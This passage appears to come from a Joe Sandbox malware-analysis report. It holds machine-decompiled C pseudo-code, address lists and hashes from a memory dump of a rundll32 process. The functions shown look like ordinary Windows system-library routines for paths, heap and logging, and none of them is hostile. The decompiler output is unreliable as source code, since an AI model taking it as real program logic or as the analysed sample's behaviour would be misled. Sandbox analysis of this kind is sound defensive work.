                                                                                                                0x044cea8b
                                                                                                                0x044ceab5
                                                                                                                0x044ceabc
                                                                                                                0x044ceabf
                                                                                                                0x044ceabf
                                                                                                                0x044ceaca
                                                                                                                0x044ceace
                                                                                                                0x044cead0
                                                                                                                0x044ceae4
                                                                                                                0x044ceaeb
                                                                                                                0x044ceaf0
                                                                                                                0x044ceaf5
                                                                                                                0x044ceb09
                                                                                                                0x044ceb0d
                                                                                                                0x044ceb1d
                                                                                                                0x044ceb2d
                                                                                                                0x044ceb38
                                                                                                                0x044ceb3d
                                                                                                                0x044ceb41
                                                                                                                0x044ceb4a
                                                                                                                0x044ceb60
                                                                                                                0x044ceb4c
                                                                                                                0x044ceb52
                                                                                                                0x044ceb59
                                                                                                                0x044ceb59
                                                                                                                0x044ceb68
                                                                                                                0x044ceb71
                                                                                                                0x044ceb71
                                                                                                                0x044cea8d
                                                                                                                0x044cea8f
                                                                                                                0x044cea92
                                                                                                                0x044cea97
                                                                                                                0x044cea97
                                                                                                                0x044cea9b
                                                                                                                0x044cea9c
                                                                                                                0x044cea9e
                                                                                                                0x044ceaa6
                                                                                                                0x044ceaa6
                                                                                                                0x044ceb7e

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                                                                • Instruction ID: f55812c8debf529a2929677a80f95042eceb16ff7ccb2d9e54ddf254d3d67d52
                                                                                                                • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                                                                • Instruction Fuzzy Hash: 7931E1366047059FDB29DF25C880A6BB7A9FBC0214F18492EE55687341EB31F809CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044869A6 Relevance: .1, Instructions: 108COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 69%
                                                                                                                			E044869A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x44fd360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L04416C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E04486BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E04449980() >= 0) {
							E04422280(_t56, 0x44f8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x44f8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x44f8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E0440B6F0(0x43ec338, 0x43ec288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E04449520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E044495D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E0441FFB0(_t68, _t77, 0x44f8778);
				}
				_pop(_t78);
				return E0444B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                                                                                0x044869b5
                                                                                                                0x044869be
                                                                                                                0x044869c3
                                                                                                                0x044869c9
                                                                                                                0x044869cc
                                                                                                                0x044869d1
                                                                                                                0x044869d3
                                                                                                                0x044869de
                                                                                                                0x044869e1
                                                                                                                0x044869ea
                                                                                                                0x044869f6
                                                                                                                0x044869fe
                                                                                                                0x04486a13
                                                                                                                0x04486a14
                                                                                                                0x04486a15
                                                                                                                0x04486a16
                                                                                                                0x04486a1e
                                                                                                                0x04486a26
                                                                                                                0x04486a31
                                                                                                                0x04486a36
                                                                                                                0x04486a37
                                                                                                                0x04486a40
                                                                                                                0x04486a49
                                                                                                                0x04486a4a
                                                                                                                0x04486a53
                                                                                                                0x04486a59
                                                                                                                0x04486a5d
                                                                                                                0x04486a5e
                                                                                                                0x04486a64
                                                                                                                0x04486a67
                                                                                                                0x04486a6a
                                                                                                                0x04486a6d
                                                                                                                0x04486a70
                                                                                                                0x04486a77
                                                                                                                0x04486a7d
                                                                                                                0x04486a86
                                                                                                                0x04486a89
                                                                                                                0x04486a9c
                                                                                                                0x04486a9f
                                                                                                                0x04486aa2
                                                                                                                0x04486aa5
                                                                                                                0x04486aaf
                                                                                                                0x04486ab1
                                                                                                                0x04486ab8
                                                                                                                0x04486ab9
                                                                                                                0x04486abb
                                                                                                                0x04486abe
                                                                                                                0x04486ac5
                                                                                                                0x04486ac5
                                                                                                                0x04486aaf
                                                                                                                0x04486a40
                                                                                                                0x04486a26
                                                                                                                0x044869fe
                                                                                                                0x04486ace
                                                                                                                0x04486ad0
                                                                                                                0x04486ad3
                                                                                                                0x04486ad8
                                                                                                                0x04486adf
                                                                                                                0x04486adf
                                                                                                                0x04486ae8
                                                                                                                0x04486aef
                                                                                                                0x04486aef
                                                                                                                0x04486af9
                                                                                                                0x04486b06

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d35313019700520097db991afb4ea01bc963be9a8a8a2939b37da0ce458a35b2
                                                                                                                • Instruction ID: 749b3a4940953d9cf21bd3b2331db29d2cd4d0f65e3543c3cb254cda3fb14204
                                                                                                                • Opcode Fuzzy Hash: d35313019700520097db991afb4ea01bc963be9a8a8a2939b37da0ce458a35b2
                                                                                                                • Instruction Fuzzy Hash: FD416AB1D00208AFEF14DFA6D940BEEBBF4EF88714F14812EE914A7251DB74A905CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04405210 Relevance: .1, Instructions: 107COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E04405210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E044052A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E044495D0();
							L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E0441EB70(_t54, 0x44f79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E044495D0();
								L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E0441EB70(_t54, 0x44f79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0444F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E0441EB70(_t54, 0x44f79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E044495D0();
							L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                                                                                0x04405220
                                                                                                                0x04405224
                                                                                                                0x04460d13
                                                                                                                0x04460d16
                                                                                                                0x04460d19
                                                                                                                0x0440522a
                                                                                                                0x0440522a
                                                                                                                0x0440522d
                                                                                                                0x0440522d
                                                                                                                0x04405231
                                                                                                                0x04405235
                                                                                                                0x04405239
                                                                                                                0x04460d5c
                                                                                                                0x04460d62
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04460d6a
                                                                                                                0x04460d7b
                                                                                                                0x04460d7f
                                                                                                                0x04460d81
                                                                                                                0x04460d84
                                                                                                                0x04460d95
                                                                                                                0x04460d95
                                                                                                                0x04460d6c
                                                                                                                0x04460d71
                                                                                                                0x04460d71
                                                                                                                0x04460d9a
                                                                                                                0x00000000
                                                                                                                0x0440524a
                                                                                                                0x0440524a
                                                                                                                0x04405250
                                                                                                                0x04460d24
                                                                                                                0x04460d35
                                                                                                                0x04460d39
                                                                                                                0x04460d3b
                                                                                                                0x04460d3e
                                                                                                                0x04460d50
                                                                                                                0x04460d50
                                                                                                                0x04460d26
                                                                                                                0x04460d2b
                                                                                                                0x04460d2b
                                                                                                                0x00000000
                                                                                                                0x04460d55
                                                                                                                0x04405256
                                                                                                                0x0440525b
                                                                                                                0x04405265
                                                                                                                0x04460da7
                                                                                                                0x0440526b
                                                                                                                0x0440526e
                                                                                                                0x04405272
                                                                                                                0x04460db1
                                                                                                                0x04460db4
                                                                                                                0x04460dc5
                                                                                                                0x04460dc5
                                                                                                                0x04405272
                                                                                                                0x04405278
                                                                                                                0x0440527e
                                                                                                                0x0440528a
                                                                                                                0x0440528c
                                                                                                                0x0440528d
                                                                                                                0x00000000
                                                                                                                0x04405280
                                                                                                                0x04405282
                                                                                                                0x04405288
                                                                                                                0x0440529f
                                                                                                                0x04405292
                                                                                                                0x00000000
                                                                                                                0x04405292
                                                                                                                0x00000000
                                                                                                                0x04405288
                                                                                                                0x0440527e

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 79d1fc6a4f59824b5edf37c514cfec5daf7081d2c7254c92f55780daebd6113c
                                                                                                                • Instruction ID: 71ea1af81287e8429b74c675136b657f9ddd52e7ac9f122c1cdcfe1e3b9a78c0
                                                                                                                • Opcode Fuzzy Hash: 79d1fc6a4f59824b5edf37c514cfec5daf7081d2c7254c92f55780daebd6113c
                                                                                                                • Instruction Fuzzy Hash: 3D31E231641610ABEF32DB29C940F26B765EF50724F20872FE8160B6E1EB70F811CE92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04443D43 Relevance: .1, Instructions: 106COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E04443D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E04417B60(0, _t61, 0x43e11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E04417B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L04424620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                                                                                0x04443d4c
                                                                                                                0x04443d50
                                                                                                                0x04443d55
                                                                                                                0x04443d5e
                                                                                                                0x0447e79a
                                                                                                                0x00000000
                                                                                                                0x0447e79a
                                                                                                                0x04443d68
                                                                                                                0x0447e789
                                                                                                                0x04443d9d
                                                                                                                0x04443da3
                                                                                                                0x04443daf
                                                                                                                0x04443db5
                                                                                                                0x04443dbc
                                                                                                                0x04443dc4
                                                                                                                0x04443dc9
                                                                                                                0x04443dce
                                                                                                                0x0447e7ae
                                                                                                                0x0447e7ae
                                                                                                                0x04443dde
                                                                                                                0x04443de2
                                                                                                                0x04443de7
                                                                                                                0x04443e0d
                                                                                                                0x04443e13
                                                                                                                0x04443e16
                                                                                                                0x04443e1e
                                                                                                                0x04443e25
                                                                                                                0x04443e28
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04443e2a
                                                                                                                0x04443e2f
                                                                                                                0x04443e37
                                                                                                                0x04443e37
                                                                                                                0x00000000
                                                                                                                0x04443e37
                                                                                                                0x04443e31
                                                                                                                0x00000000
                                                                                                                0x04443e31
                                                                                                                0x04443e20
                                                                                                                0x04443e20
                                                                                                                0x04443e35
                                                                                                                0x00000000
                                                                                                                0x04443de9
                                                                                                                0x04443de9
                                                                                                                0x04443de9
                                                                                                                0x04443dee
                                                                                                                0x04443dfd
                                                                                                                0x04443dff
                                                                                                                0x04443e02
                                                                                                                0x04443e05
                                                                                                                0x04443e05
                                                                                                                0x00000000
                                                                                                                0x04443df0
                                                                                                                0x04443de7
                                                                                                                0x0447e78f
                                                                                                                0x0447e794
                                                                                                                0x04443d79
                                                                                                                0x04443d84
                                                                                                                0x04443d89
                                                                                                                0x04443d8e
                                                                                                                0x00000000
                                                                                                                0x0447e7a4
                                                                                                                0x04443d96
                                                                                                                0x04443d9a
                                                                                                                0x00000000
                                                                                                                0x04443d9a
                                                                                                                0x00000000
                                                                                                                0x0447e794
                                                                                                                0x04443d6e
                                                                                                                0x04443d73
                                                                                                                0x00000000
                                                                                                                0x0447e7b5
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2bcffa58d011e32729562f0c5c107666b814e79f9bff4d27394f116dbccc01e7
                                                                                                                • Instruction ID: e5bbbcbb1190c98f683931cb2692aeebc19557ce9a0d8946af503742d659a880
                                                                                                                • Opcode Fuzzy Hash: 2bcffa58d011e32729562f0c5c107666b814e79f9bff4d27394f116dbccc01e7
                                                                                                                • Instruction Fuzzy Hash: F0317E71B05615DBEF348F2AC841A6BBBB5EF95B10B15806BE849CB350E730E941D790
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04487016 Relevance: .1, Instructions: 104COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E04487016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x44fd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E04486B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E04486B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E04427D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E04449AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0444B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L04424620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                                                                                0x04487016
                                                                                                                0x0448701e
                                                                                                                0x0448702b
                                                                                                                0x04487033
                                                                                                                0x04487037
                                                                                                                0x0448703c
                                                                                                                0x0448703e
                                                                                                                0x04487041
                                                                                                                0x04487045
                                                                                                                0x0448704a
                                                                                                                0x04487050
                                                                                                                0x04487055
                                                                                                                0x0448705a
                                                                                                                0x04487062
                                                                                                                0x04487062
                                                                                                                0x0448705a
                                                                                                                0x04487064
                                                                                                                0x04487064
                                                                                                                0x04487067
                                                                                                                0x04487071
                                                                                                                0x04487096
                                                                                                                0x0448709b
                                                                                                                0x044870a2
                                                                                                                0x044870a6
                                                                                                                0x044870a7
                                                                                                                0x044870ad
                                                                                                                0x044870b3
                                                                                                                0x044870b6
                                                                                                                0x044870bb
                                                                                                                0x044870c3
                                                                                                                0x044870c3
                                                                                                                0x044870c6
                                                                                                                0x044870cd
                                                                                                                0x044870dd
                                                                                                                0x044870e0
                                                                                                                0x044870e2
                                                                                                                0x044870e2
                                                                                                                0x044870ee
                                                                                                                0x04487101
                                                                                                                0x044870f0
                                                                                                                0x044870f9
                                                                                                                0x044870f9
                                                                                                                0x0448710a
                                                                                                                0x0448710e
                                                                                                                0x04487112
                                                                                                                0x04487117
                                                                                                                0x04487118
                                                                                                                0x04487118
                                                                                                                0x044870bb
                                                                                                                0x0448711d
                                                                                                                0x04487123
                                                                                                                0x04487131
                                                                                                                0x04487131
                                                                                                                0x04487136
                                                                                                                0x0448713d
                                                                                                                0x0448713e
                                                                                                                0x0448713f
                                                                                                                0x0448714a
                                                                                                                0x0448714a
                                                                                                                0x04487084
                                                                                                                0x04487088
                                                                                                                0x00000000
                                                                                                                0x0448708e
                                                                                                                0x0448708e
                                                                                                                0x04487092
                                                                                                                0x00000000
                                                                                                                0x04487092

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 518a6f19e18e79d1d2011e3c2f87a6857292e00c5dddcfe599f223e5deaf0715
                                                                                                                • Instruction ID: 70bacc6db00a65be5d20172ac41751fd33d2e629fbe12a067cf1672d78709e60
                                                                                                                • Opcode Fuzzy Hash: 518a6f19e18e79d1d2011e3c2f87a6857292e00c5dddcfe599f223e5deaf0715
                                                                                                                • Instruction Fuzzy Hash: B231D0726047919BC720EF68CD50A6BB3A5BFC8700F144A2EF89587781E730F904CBA6
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0442C182 Relevance: .1, Instructions: 104COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 68%
                                                                                                                			E0442C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E04427D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E044D8D34(_v8, _t80);
					}
					E04422280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0441FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E044D8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0441FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0444B180();
						if(_a4 != 0) {
							E04422280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0442BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0442BB2D(_t16, _t15);
						E0442B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0441FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0441FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0441FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                                                                                0x0442c18d
                                                                                                                0x0442c18f
                                                                                                                0x0442c191
                                                                                                                0x0442c19b
                                                                                                                0x0442c1a0
                                                                                                                0x0442c1d4
                                                                                                                0x0442c1de
                                                                                                                0x04472d6e
                                                                                                                0x0442c1e4
                                                                                                                0x0442c1e4
                                                                                                                0x0442c1e4
                                                                                                                0x0442c1ec
                                                                                                                0x04472d7d
                                                                                                                0x04472d7d
                                                                                                                0x0442c1f3
                                                                                                                0x0442c1ff
                                                                                                                0x04472d88
                                                                                                                0x04472d8d
                                                                                                                0x04472d94
                                                                                                                0x04472d94
                                                                                                                0x04472d9f
                                                                                                                0x04472da4
                                                                                                                0x04472dab
                                                                                                                0x04472db0
                                                                                                                0x04472db2
                                                                                                                0x04472db3
                                                                                                                0x04472db4
                                                                                                                0x04472dbc
                                                                                                                0x04472dc3
                                                                                                                0x04472dc3
                                                                                                                0x0442c205
                                                                                                                0x0442c205
                                                                                                                0x0442c208
                                                                                                                0x0442c20e
                                                                                                                0x0442c211
                                                                                                                0x0442c216
                                                                                                                0x0442c219
                                                                                                                0x0442c21f
                                                                                                                0x0442c222
                                                                                                                0x0442c22c
                                                                                                                0x0442c234
                                                                                                                0x0442c23a
                                                                                                                0x0442c23f
                                                                                                                0x0442c245
                                                                                                                0x0442c24b
                                                                                                                0x0442c251
                                                                                                                0x0442c25a
                                                                                                                0x0442c276
                                                                                                                0x0442c27d
                                                                                                                0x0442c27d
                                                                                                                0x0442c25c
                                                                                                                0x0442c25c
                                                                                                                0x00000000
                                                                                                                0x0442c25e
                                                                                                                0x0442c1a4
                                                                                                                0x0442c1aa
                                                                                                                0x0442c1b3
                                                                                                                0x0442c265
                                                                                                                0x0442c26c
                                                                                                                0x0442c26c
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
